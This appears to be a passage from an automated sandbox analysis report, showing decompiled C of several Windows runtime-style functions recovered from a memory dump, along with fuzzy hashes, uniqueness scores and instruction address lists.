                        • Instruction ID: 79ba833688be56f02e608e7fca6caf87214a9ce7740e53220ed46d4b78b46a49
                        • Opcode Fuzzy Hash: 074ce8a1bd19452f3fa5a4a35d57c37df9f3e3255a6342694d02d9e93e3a88b7
                        • Instruction Fuzzy Hash: 8331F432641A10EBC726AB58C880B66B7B6FF14760F518B99FD560B5E0DF75E840CA90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2A61C, Relevance: .1, Instructions: 106COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E02B2A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x2bd0220);
				E02B4D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x2be7b9c; // 0x0
				_t55 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E02B4D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x2be7b10 =  *0x2be7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x2be536c; // 0x603fb0
					if( *_t51 != 0x2be5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x2be5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x2be536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E02B2A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                        0x02b2a61c
                        0x02b2a61e
                        0x02b2a623
                        0x02b2a628
                        0x02b2a62b
                        0x02b2a62d
                        0x02b2a648
                        0x02b2a64a
                        0x02b2a64f
                        0x02b69b44
                        0x02b2a6ec
                        0x02b2a6f1
                        0x02b2a6f1
                        0x02b2a655
                        0x02b2a657
                        0x02b2a65a
                        0x02b2a65d
                        0x02b2a662
                        0x02b2a663
                        0x02b2a667
                        0x02b2a668
                        0x02b2a66d
                        0x02b2a706
                        0x02b2a706
                        0x02b69bda
                        0x02b69be6
                        0x02b69beb
                        0x00000000
                        0x02b69beb
                        0x02b2a679
                        0x02b69b7a
                        0x00000000
                        0x02b69b7a
                        0x02b2a683
                        0x02b2a6f4
                        0x02b2a6f7
                        0x02b2a6f9
                        0x02b2a6fd
                        0x02b2a6a0
                        0x02b2a6a0
                        0x02b2a6ad
                        0x02b2a6af
                        0x02b2a6b4
                        0x02b69ba7
                        0x02b69bac
                        0x00000000
                        0x00000000
                        0x02b69bc6
                        0x02b69bce
                        0x02b69bd1
                        0x02b69bd3
                        0x02b69bd3
                        0x00000000
                        0x02b69bd1
                        0x02b2a6bd
                        0x02b2a6c3
                        0x02b2a6c6
                        0x02b2a6d2
                        0x02b2a701
                        0x02b2a704
                        0x00000000
                        0x02b2a704
                        0x02b2a6d4
                        0x02b2a6d6
                        0x02b2a6d9
                        0x02b2a6db
                        0x02b2a6e1
                        0x02b2a6e6
                        0x02b2a6e8
                        0x02b2a6e8
                        0x02b2a6ea
                        0x00000000
                        0x02b2a6ea
                        0x02b2a688
                        0x02b2a692
                        0x02b2a694
                        0x02b2a699
                        0x00000000
                        0x00000000
                        0x02b2a69d
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58a00c496158e7bd6fad57aabb5c7c328ecb7626e51f061b3459f244b0f38136
                        • Instruction ID: 9b1e7084773bd04947b767ffa3d961b6e2c6f2e37a89b880b592814fdd8eb1e2
                        • Opcode Fuzzy Hash: 58a00c496158e7bd6fad57aabb5c7c328ecb7626e51f061b3459f244b0f38136
                        • Instruction Fuzzy Hash: 4E4136B5A01315DFCB15CF68C490BA9BBF2FB49714F1980A9E909AF354C778A901CF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B33D43, Relevance: .1, Instructions: 106COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B33D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E02B07B60(0, _t61, 0x2ad11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E02B07B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L02B14620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                        0x02b33d4c
                        0x02b33d50
                        0x02b33d55
                        0x02b33d5e
                        0x02b6e79a
                        0x00000000
                        0x02b6e79a
                        0x02b33d68
                        0x02b6e789
                        0x02b33d9d
                        0x02b33da3
                        0x02b33daf
                        0x02b33db5
                        0x02b33dbc
                        0x02b33dc4
                        0x02b33dc9
                        0x02b33dce
                        0x02b6e7ae
                        0x02b6e7ae
                        0x02b33dde
                        0x02b33de2
                        0x02b33de7
                        0x02b33e0d
                        0x02b33e13
                        0x02b33e16
                        0x02b33e1e
                        0x02b33e25
                        0x02b33e28
                        0x00000000
                        0x00000000
                        0x02b33e2a
                        0x02b33e2f
                        0x02b33e37
                        0x02b33e37
                        0x00000000
                        0x02b33e37
                        0x02b33e31
                        0x00000000
                        0x02b33e31
                        0x02b33e20
                        0x02b33e20
                        0x02b33e35
                        0x00000000
                        0x02b33de9
                        0x02b33de9
                        0x02b33de9
                        0x02b33dee
                        0x02b33dfd
                        0x02b33dff
                        0x02b33e02
                        0x02b33e05
                        0x02b33e05
                        0x00000000
                        0x02b33df0
                        0x02b33de7
                        0x02b6e78f
                        0x02b6e794
                        0x02b33d79
                        0x02b33d84
                        0x02b33d89
                        0x02b33d8e
                        0x00000000
                        0x02b6e7a4
                        0x02b33d96
                        0x02b33d9a
                        0x00000000
                        0x02b33d9a
                        0x00000000
                        0x02b6e794
                        0x02b33d6e
                        0x02b33d73
                        0x00000000
                        0x02b6e7b5
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a55f279d2f740d6f89e98a637fb827d05063a060ecbad1c1e7b6c5204ad36f35
                        • Instruction ID: 178431f019208b1d4506568a299897af236e3bbdcea5e2cf8b4ffc2cfb04540f
                        • Opcode Fuzzy Hash: a55f279d2f740d6f89e98a637fb827d05063a060ecbad1c1e7b6c5204ad36f35
                        • Instruction Fuzzy Hash: 72319E35A05625DBC7268F2DD885A7BBBF5EF45710B0580EAE84ACB350EB34D840C7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B77016, Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E02B77016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x2bed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E02B76B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E02B76B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E02B17D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E02B39AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E02B3B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L02B14620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                        0x02b77016
                        0x02b7701e
                        0x02b7702b
                        0x02b77033
                        0x02b77037
                        0x02b7703c
                        0x02b7703e
                        0x02b77041
                        0x02b77045
                        0x02b7704a
                        0x02b77050
                        0x02b77055
                        0x02b7705a
                        0x02b77062
                        0x02b77062
                        0x02b7705a
                        0x02b77064
                        0x02b77064
                        0x02b77067
                        0x02b77071
                        0x02b77096
                        0x02b7709b
                        0x02b770a2
                        0x02b770a6
                        0x02b770a7
                        0x02b770ad
                        0x02b770b3
                        0x02b770b6
                        0x02b770bb
                        0x02b770c3
                        0x02b770c3
                        0x02b770c6
                        0x02b770cd
                        0x02b770dd
                        0x02b770e0
                        0x02b770e2
                        0x02b770e2
                        0x02b770ee
                        0x02b77101
                        0x02b770f0
                        0x02b770f9
                        0x02b770f9
                        0x02b7710a
                        0x02b7710e
                        0x02b77112
                        0x02b77117
                        0x02b77118
                        0x02b77118
                        0x02b770bb
                        0x02b7711d
                        0x02b77123
                        0x02b77131
                        0x02b77131
                        0x02b77136
                        0x02b7713d
                        0x02b7713e
                        0x02b7713f
                        0x02b7714a
                        0x02b7714a
                        0x02b77084
                        0x02b77088
                        0x00000000
                        0x02b7708e
                        0x02b7708e
                        0x02b77092
                        0x00000000
                        0x02b77092

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cec6042ba6d1d5420f33d7102b0de90b78682b1e66ebba0ef8d17f543bb81949
                        • Instruction ID: 27d42e28b2b8be2e82056f43034f849a64f523227c36c90a80c5bddcc5d08e65
                        • Opcode Fuzzy Hash: cec6042ba6d1d5420f33d7102b0de90b78682b1e66ebba0ef8d17f543bb81949
                        • Instruction Fuzzy Hash: 9031C2726047519FC321DF28C841A6AF7E9FF88704F044A69F8A587790EB30E904DBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B1C182, Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E02B1C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E02B17D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E02BC8D34(_v8, _t80);
					}
					E02B12280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E02B0FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E02BC8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E02B0FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E02B3B180();
						if(_a4 != 0) {
							E02B12280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E02B1BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E02B1BB2D(_t16, _t15);
						E02B1B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E02B0FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E02B0FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E02B0FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                        0x02b1c18d
                        0x02b1c18f
                        0x02b1c191
                        0x02b1c19b
                        0x02b1c1a0
                        0x02b1c1d4
                        0x02b1c1de
                        0x02b62d6e
                        0x02b1c1e4
                        0x02b1c1e4
                        0x02b1c1e4
                        0x02b1c1ec
                        0x02b62d7d
                        0x02b62d7d
                        0x02b1c1f3
                        0x02b1c1ff
                        0x02b62d88
                        0x02b62d8d
                        0x02b62d94
                        0x02b62d94
                        0x02b62d9f
                        0x02b62da4
                        0x02b62dab
                        0x02b62db0
                        0x02b62db2
                        0x02b62db3
                        0x02b62db4
                        0x02b62dbc
                        0x02b62dc3
                        0x02b62dc3
                        0x02b1c205
                        0x02b1c205
                        0x02b1c208
                        0x02b1c20e
                        0x02b1c211
                        0x02b1c216
                        0x02b1c219
                        0x02b1c21f
                        0x02b1c222
                        0x02b1c22c
                        0x02b1c234
                        0x02b1c23a
                        0x02b1c23f
                        0x02b1c245
                        0x02b1c24b
                        0x02b1c251
                        0x02b1c25a
                        0x02b1c276
                        0x02b1c27d
                        0x02b1c27d
                        0x02b1c25c
                        0x02b1c25c
                        0x00000000
                        0x02b1c25e
                        0x02b1c1a4
                        0x02b1c1aa
                        0x02b1c1b3
                        0x02b1c265
                        0x02b1c26c
                        0x02b1c26c
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction ID: 9759f17723e6c2534aa61c20791d57a81ac709c3f3ddb8c87367f58e04b25cb8
                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction Fuzzy Hash: D1312471B41586ABD709EBB4C480BFAFB65FF52344F5441DBC41847241CB386A5ACBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BA3D40, Relevance: .1, Instructions: 98COMMON
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E02BA3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x2bed360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E02B12280(_t34, 0x2be8a6c);
				_t64 =  *0x2be5768; // 0x77f05768
				if(_t64 != 0x2be5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E02B0FFB0(_t53, _t64, 0x2be8a6c);
						 *0x2beb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E02B12280(_t45, 0x2be8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x2be5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E02B0FFB0(_t51, _t64, 0x2be8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E02B3B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                        0x02ba3d40
                        0x02ba3d48
                        0x02ba3d52
                        0x02ba3d59
                        0x02ba3d5d
                        0x02ba3d61
                        0x02ba3d63
                        0x02ba3d67
                        0x02ba3d69
                        0x02ba3d72
                        0x02ba3d76
                        0x02ba3d7a
                        0x02ba3d7f
                        0x02ba3d8b
                        0x02ba3d91
                        0x02ba3d91
                        0x02ba3d91
                        0x02ba3d94
                        0x02ba3d96
                        0x02ba3d9d
                        0x02ba3da1
                        0x02ba3db0
                        0x02ba3dba
                        0x02ba3dbc
                        0x02ba3dbc
                        0x02ba3dc6
                        0x02ba3dcb
                        0x02ba3dcf
                        0x02ba3dd1
                        0x02ba3dd4
                        0x00000000
                        0x00000000
                        0x02ba3dd9
                        0x02ba3e0c
                        0x02ba3e0c
                        0x02ba3e0f
                        0x02ba3ddb
                        0x02ba3ddb
                        0x02ba3de0
                        0x00000000
                        0x02ba3de2
                        0x02ba3de2
                        0x02ba3de4
                        0x02ba3de8
                        0x02ba3deb
                        0x02ba3df1
                        0x00000000
                        0x02ba3df3
                        0x02ba3df3
                        0x02ba3df5
                        0x02ba3df8
                        0x02ba3dfa
                        0x00000000
                        0x02ba3dfa
                        0x02ba3df1
                        0x02ba3de0
                        0x02ba3e11
                        0x02ba3e11
                        0x00000000
                        0x02ba3dfe
                        0x02ba3e04
                        0x02ba3e06
                        0x00000000
                        0x02ba3e06
                        0x00000000
                        0x02ba3e04
                        0x02ba3d91
                        0x02ba3e15
                        0x02ba3e1a
                        0x02ba3e1f
                        0x02ba3e1f
                        0x02ba3e23
                        0x02ba3e29
                        0x00000000
                        0x00000000
                        0x02ba3e2e
                        0x00000000
                        0x02ba3e30
                        0x02ba3e30
                        0x02ba3e35
                        0x00000000
                        0x02ba3e37
                        0x02ba3e3e
                        0x02ba3e42
                        0x02ba3e48
                        0x02ba3e4e
                        0x00000000
                        0x02ba3e4e
                        0x02ba3e35
                        0x00000000
                        0x02ba3e2e
                        0x02ba3e5b
                        0x02ba3e5c
                        0x02ba3e5d
                        0x02ba3e68
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df42b0996043d01cc9bbb503485d4247b24a4f90a24db2020ad2b82da2309f87
                        • Instruction ID: a8ed0ccbc4e1057b7c2f57c4e9de43447b5327dbcd627d090de5e8bf4afdf40d
                        • Opcode Fuzzy Hash: df42b0996043d01cc9bbb503485d4247b24a4f90a24db2020ad2b82da2309f87
                        • Instruction Fuzzy Hash: DC317971649302DFCB24DF24C59091ABBE1FF85704F4449EEF4999B250D730D904CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2A70E, Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E02B2A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x2be7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x2be7b10 = 8;
					 *0x2be7b14 = 0x2be7b0c;
					 *0x2be7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E02B2A990(0x2be7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L02B2A840(__edx, __ecx, __ecx, _t52, 0x2be7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x2be7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x2be7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x2be7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L02B14620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x2be7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E02B3F3E0(_t50,  *0x2be7b14, _t8 >> 3);
						_t28 =  *0x2be7b14; // 0x77f07b0c
						__eflags = _t28 - 0x2be7b0c;
						if(_t28 != 0x2be7b0c) {
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x2be7b14 = _t50;
						_t48 = _v12;
						 *0x2be7b10 = _t9;
						goto L6;
					}
					 *0x2be7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                        0x02b2a713
                        0x02b2a714
                        0x02b2a717
                        0x02b2a71d
                        0x02b2a720
                        0x02b2a722
                        0x02b2a727
                        0x02b2a74a
                        0x02b2a754
                        0x02b2a75e
                        0x02b2a768
                        0x02b2a76a
                        0x02b2a773
                        0x02b2a78b
                        0x02b2a790
                        0x02b2a792
